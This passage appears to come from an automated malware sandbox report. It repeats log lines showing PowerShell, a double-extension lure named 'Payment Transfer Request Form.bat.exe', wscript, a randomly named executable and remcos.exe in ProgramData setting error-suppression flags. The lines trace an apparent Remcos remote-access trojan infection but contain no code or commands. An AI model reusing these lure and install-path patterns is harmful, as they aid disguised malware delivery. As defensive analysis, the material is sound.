              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
